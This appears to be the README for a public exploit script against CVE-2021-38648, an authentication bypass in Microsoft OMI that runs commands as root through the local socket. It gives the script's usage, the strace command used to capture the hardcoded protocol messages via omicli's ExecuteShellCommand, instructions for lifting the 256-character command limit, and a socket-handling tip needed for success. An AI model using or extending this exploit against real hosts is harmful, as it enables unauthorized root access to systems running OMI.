# CVE-2021-38648 Microsoft OMI Management Interface Authentication Bypass

This is a local privilege escalation (LPE) exploit for CVE-2021-38648.
## Usage

```
usage: cve_2021_38648.py [-h] [-s SOCKET_PATH] [--timeout TIMEOUT] command

positional arguments:
  command               the command to run

optional arguments:
  -h, --help            show this help message and exit
  -s SOCKET_PATH, --socket SOCKET_PATH
                        socket file
  --timeout TIMEOUT     response timeout
```
The exploit will exit with a status of 0 on success. The command is limited to 256 characters in length because the messages that are exchanged are hardcoded. To increase this limit, generate a new series of messages using the strace command below, search for the second `writev` syscall and extract each `iovec` instance. There should be six in total, and the first 4 bytes of each should be consistent.
The hardcoded messages were recovered using:

```shell
strace -v -s 5000 -f -xx -e trace=socket,connect,write,writev,close \
  /opt/omi/bin/omicli iv root/scx { SCX_OperatingSystem } ExecuteShellCommand { command '...' timeout 0 }
```
It is important that the exploit wait on the socket for a response to be received. It doesn't need to be read, but the socket needs to be kept open until either the server closes it or the response is received.